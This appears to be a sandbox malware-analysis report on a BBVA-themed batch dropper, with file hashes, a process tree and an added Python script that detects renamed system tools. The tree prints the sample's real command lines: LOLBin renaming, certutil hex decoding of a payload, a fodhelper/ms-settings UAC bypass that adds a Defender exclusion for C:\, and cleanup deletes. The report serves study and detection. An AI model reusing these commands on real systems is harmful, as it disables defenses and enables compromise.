Analysis
max time kernel: 141s
max time network: 125s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 06-06-2024 15:27
Static task: static1
Behavioral task: behavioral1
  Sample: BBVA_74008300085000288003.bat
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: BBVA_74008300085000288003.bat
  Resource: win10v2004-20240426-en
General
Target: BBVA_74008300085000288003.bat
Size: 3.0MB
MD5: 17c7045b36fae5916e2900899e40fcdc
SHA1: 793de1034b8dbce1547b85d7348324e8fb5d0106
SHA256: 1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df
SHA512: f4be2aa7efaad65542147360369292774d242c0cc8ab6489036f601b9e914642a3183d0a2b0130d216e2b40baaebf368395cf755a5680999c2e83cfcdf899e46
SSDEEP: 49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4K3:x
Malware Config
Signatures
- Executes dropped EXE (24 IoCs)
  pid   process
  1724  alpha.exe
  2272  alpha.exe
  2320  alpha.exe
  1584  alpha.exe
  2152  kn.exe
  1772  alpha.exe
  2984  alpha.exe
  2564  alpha.exe
  2556  alpha.exe
  2804  xkn.exe
  2524  alpha.exe
  2388  ger.exe
  2500  alpha.exe
  2532  kn.exe
  2936  alpha.exe
  2256  Ping_c.pif
  2040  alpha.exe
  556   alpha.exe
  1868  alpha.exe
  1864  alpha.exe
  2592  alpha.exe
  2588  alpha.exe
  2716  alpha.exe
  2624  alpha.exe
- Loads dropped DLL (18 IoCs)
  pid   process
  2156  cmd.exe (4 loads)
  1584  alpha.exe
  2156  cmd.exe (4 loads)
  2556  alpha.exe
  2804  xkn.exe (3 loads)
  2524  alpha.exe
  2156  cmd.exe
  2500  alpha.exe
  1944  WerFault.exe (2 loads)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoCs)
  pid   process        target pid  target process
  1944  WerFault.exe   2256        Ping_c.pif
- Kills process with taskkill (1 IoCs)
  pid   process
  1060  taskkill.exe
- Modifies registry class (5 IoCs), all by ger.exe
  Key created   \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings
  Key created   \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell
  Key created   \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open
  Key created   \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command
  Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid   process
  2256  Ping_c.pif
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   process
  2804  xkn.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege  pid 2804  xkn.exe
  Token: SeDebugPrivilege  pid 1060  taskkill.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Each parent -> child pair below is recorded three times in the raw listing; the last pair appears once because the listing stops at 64 entries.
  2156 cmd.exe   -> 300  extrac32.exe
  2156 cmd.exe   -> 1724 alpha.exe
  2156 cmd.exe   -> 2272 alpha.exe
  2156 cmd.exe   -> 2320 alpha.exe
  2320 alpha.exe -> 2444 extrac32.exe
  2156 cmd.exe   -> 1584 alpha.exe
  1584 alpha.exe -> 2152 kn.exe
  2156 cmd.exe   -> 1772 alpha.exe
  1772 alpha.exe -> 2988 extrac32.exe
  2156 cmd.exe   -> 2984 alpha.exe
  2984 alpha.exe -> 2512 extrac32.exe
  2156 cmd.exe   -> 2564 alpha.exe
  2564 alpha.exe -> 2640 extrac32.exe
  2156 cmd.exe   -> 2556 alpha.exe
  2556 alpha.exe -> 2804 xkn.exe
  2804 xkn.exe   -> 2524 alpha.exe
  2524 alpha.exe -> 2388 ger.exe
  2156 cmd.exe   -> 2500 alpha.exe
  2500 alpha.exe -> 2532 kn.exe
  2156 cmd.exe   -> 2936 alpha.exe
  2936 alpha.exe -> 1060 taskkill.exe
  2156 cmd.exe   -> 2256 Ping_c.pif
Processes
The number in brackets is the depth in the process tree as shown by the sandbox; the command line follows the image path, then the signatures that fired for that process.

- [1] C:\Windows\system32\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat"
      Loads dropped DLL; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\extrac32.exe
        C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Executes dropped EXE; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
        Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Public\kn.exe
          C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
          Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Executes dropped EXE; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Executes dropped EXE; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Executes dropped EXE; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Public\xkn.exe
          C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
          Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] C:\Users\Public\alpha.exe
            "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
            Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
        - [5] C:\Users\Public\ger.exe
              C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Executes dropped EXE; Modifies registry class
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Public\kn.exe
          C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
          Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        Executes dropped EXE; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\taskkill.exe
          taskkill /F /IM SystemSettings.exe
          Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Public\Libraries\Ping_c.pif
        C:\Users\Public\Libraries\Ping_c.pif
        Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam
    - [3] C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 780
          Loads dropped DLL; Program crash
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
        Executes dropped EXE
  - [2] C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        Executes dropped EXE
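Reading the tree: the batch file never runs a system tool under its own name. It uses extrac32 to copy cmd.exe, certutil.exe, reg.exe, powershell.exe and fodhelper.exe out of System32 as alpha, kn, ger, xkn and per; creates a mock trusted directory whose name carries a trailing space ("C:\Windows \System32", created through the \\?\ prefix so the space survives); carves Ping_c.pif out of its own body with two certutil -decodehex passes (the .bat is a hex polyglot, decoded first to Ping_c.mp4 and then to the .pif); writes a command into HKCU\Software\Classes\ms-settings\shell\open\command, the key fodhelper.exe consults when it auto-elevates on Windows 10, so that the renamed PowerShell adds C:\ as a Defender exclusion; kills SystemSettings.exe; and finally deletes every helper. In this Windows 7 run per.exe is neither in the dropped-files list nor launched, so the elevation step itself is not visible here, only its preparation. Any detection keyed on image names misses every step after the first copy. The Python below is an added example, not part of this report or of the sandbox vendor's tooling: it learns the renames from the extrac32 copy commands and then evaluates each later command line against the real tool behind the name. The events are constructed from the tree above with the report's pids; the four-field record layout (pid, ppid, image, command line) is an assumption, not any particular SIEM's schema.

```python
import ntpath
import re

# Constructed sample events (pid, ppid, image, command line), transcribed from
# the process tree in the report. Double backslashes are kept as the report
# shows them: the batch file writes its paths that way and Windows accepts it.
SAMPLE_EVENTS = [
    (2156, 1000, r"C:\Windows\system32\cmd.exe",
     r'cmd /c "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat"'),
    (300, 2156, r"C:\Windows\System32\extrac32.exe",
     r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"'),
    (1724, 2156, r"C:\Users\Public\alpha.exe",
     r'C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "'),
    (2444, 2320, r"C:\Windows\system32\extrac32.exe",
     r'extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe'),
    (2152, 1584, r"C:\Users\Public\kn.exe",
     r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 9'),
    (2988, 1772, r"C:\Windows\system32\extrac32.exe",
     r'extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"'),
    (2512, 2984, r"C:\Windows\system32\extrac32.exe",
     r'extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"'),
    (2640, 2564, r"C:\Windows\system32\extrac32.exe",
     r'extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"'),
    (2804, 2556, r"C:\Users\Public\xkn.exe",
     r'''C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "'''),
    (2388, 2524, r"C:\Users\Public\ger.exe",
     r'C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""'),
    (2532, 2500, r"C:\Users\Public\kn.exe",
     r'C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12'),
    (1060, 2936, r"C:\Windows\system32\taskkill.exe",
     r'taskkill /F /IM SystemSettings.exe'),
]

# "C:\Windows " followed by a separator: a mock trusted directory, not the real one.
MOCK_TRUSTED = re.compile(r'(?i)[a-z]:\\windows\s+(?:\\|"|$)')
# The verb key fodhelper.exe reads from HKCU before auto-elevating (Windows 10).
MS_SETTINGS = re.compile(r"(?i)ms-settings\\shell\\open\\command")
REG_DATA = re.compile(r'(?i)/d\s+"?([^"]+)')


def normalize(cmdline):
    """Collapse runs of backslashes so matching sees the path the kernel sees."""
    return re.sub(r"\\{2,}", r"\\", cmdline)


def split_args(cmdline):
    """Tokenize a Windows command line; a double-quoted run stays one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def tool_name(path):
    """Lower-case basename without extension: C:\\Users\\Public\\kn.exe -> 'kn'."""
    return ntpath.splitext(ntpath.basename(path.strip('"')))[0].lower()


def extrac32_copy(args):
    """extrac32 /C [/Y] <src> <dst> copies one file; return (src, dst) or None."""
    if len(args) < 3 or tool_name(args[0]) != "extrac32":
        return None
    flags = {a.lower() for a in args[1:] if a.startswith("/")}
    paths = [a for a in args[1:] if not a.startswith("/")]
    if "/c" not in flags or len(paths) != 2:
        return None
    return paths[0], paths[1]


def learn_aliases(events):
    """Map each extrac32 destination (lower-cased) to the tool it really is."""
    alias = {}
    for _, _, _, cmd in events:
        copy = extrac32_copy(split_args(cmd))
        if copy:
            alias[copy[1].lower()] = tool_name(copy[0])
    return alias


def analyze(raw_events):
    """Return (pid, rule, detail) findings for a list of (pid, ppid, image, cmdline)."""
    events = [(p, pp, normalize(img), normalize(cmd)) for p, pp, img, cmd in raw_events]
    alias = learn_aliases(events)          # pass 1: who was copied where
    findings = []
    for pid, _, image, cmd in events:      # pass 2: judge by the real tool
        args = split_args(cmd)
        shown = tool_name(image)
        real = alias.get(image.lower(), shown)
        copy = extrac32_copy(args)
        if copy and copy[0].lower().startswith("c:\\windows\\"):
            findings.append((pid, "lolbin_copy", f"{tool_name(copy[0])} -> {copy[1]}"))
        if real != shown:
            findings.append((pid, "renamed_lolbin", f"{shown} is really {real}"))
        if real == "certutil" and any(a.lower() == "-decodehex" for a in args):
            io = [a for a in args[1:] if not a.startswith("-")]
            findings.append((pid, "certutil_decodehex", " -> ".join(io[:2])))
        if MS_SETTINGS.search(cmd):        # flagged whatever binary carries it
            m = REG_DATA.search(cmd)
            findings.append((pid, "uac_bypass_ms_settings", m.group(1).strip() if m else cmd))
        if "add-mppreference" in cmd.lower():
            findings.append((pid, "defender_exclusion", real))
        if real == "taskkill" and "systemsettings.exe" in cmd.lower():
            findings.append((pid, "kill_systemsettings", cmd))
        m = MOCK_TRUSTED.search(cmd)
        if m:
            findings.append((pid, "mock_trusted_dir", m.group(0)))
    return findings


def summarize(findings):
    """Count findings per rule."""
    counts = {}
    for _, rule, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for pid, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule:<24} {detail}")
```

Two design points. The alias table is learned from the copy commands rather than from a fixed list of names, so the same logic covers the next sample that picks different throwaway names; on a real host the same mapping can be built from the file hashes in the Downloads section, where alpha.exe, kn.exe, ger.exe and xkn.exe hash to the system binaries they were copied from. The ms-settings rule deliberately ignores which binary issued the write, because the identical string appears once inside the PowerShell -Command wrapper (pid 2804) and once in the reg.exe child (pid 2388), and either alone is worth an alert.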
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Public\Libraries\Ping_c.pif
  Filesize: 1.1MB
  MD5: 962c746f045885ca2883fec129a5bb98
  SHA1: bdad34f489b6a8b3a3101d658ea426805e859473
  SHA256: 8b5cbf4eba7ce848616eda92a3eaea0372a7a97efba05ce2ebfac5c99c243e71
  SHA512: 45cd944310a28216835eea924cd03c668b948ccab63a7b6489453a69bf6a7f160d105e9879096580d571e7af1ab4deea02ec506f57f48e370b8c5918c44cdb83
- C:\Users\Public\Ping_c.mp4
  Filesize: 2.2MB
  MD5: 18fbc4b3cab1f954789cf7649dcd1dff
  SHA1: 661ba52bd44e913cd74b214e1652843f1f894e1c
  SHA256: 4bb6bb0afbf65b0bdf0d5f0963c1133f3a0d049557d485d185e1e65b5b84987a
  SHA512: de11b7621e1170f0f6d0efa75d2b75456a5b3d677d865ab07ad157b1e7ad7eec175404500e92806e7c20085512b82ad2db2c0eb83377baacd24d0500b5e501c3
- C:\Users\Public\alpha.exe
  Filesize: 337KB
  MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
  SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
  SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
  SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
- C:\Users\Public\ger.exe
  Filesize: 73KB
  MD5: 9d0b3066fe3d1fd345e86bc7bcced9e4
  SHA1: e05984a6671fcfecbc465e613d72d42bda35fd90
  SHA256: 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
  SHA512: d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
- C:\Users\Public\kn.exe
  Filesize: 1.1MB
  MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
  SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
  SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
  SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
- C:\Users\Public\xkn.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/2256-72-0x0000000000400000-0x0000000000522000-memory.dmp
  Filesize: 1.1MB
- memory/2804-44-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
  Filesize: 32KB
- memory/2804-43-0x000000001B4B0000-0x000000001B792000-memory.dmp
  Filesize: 2.9MB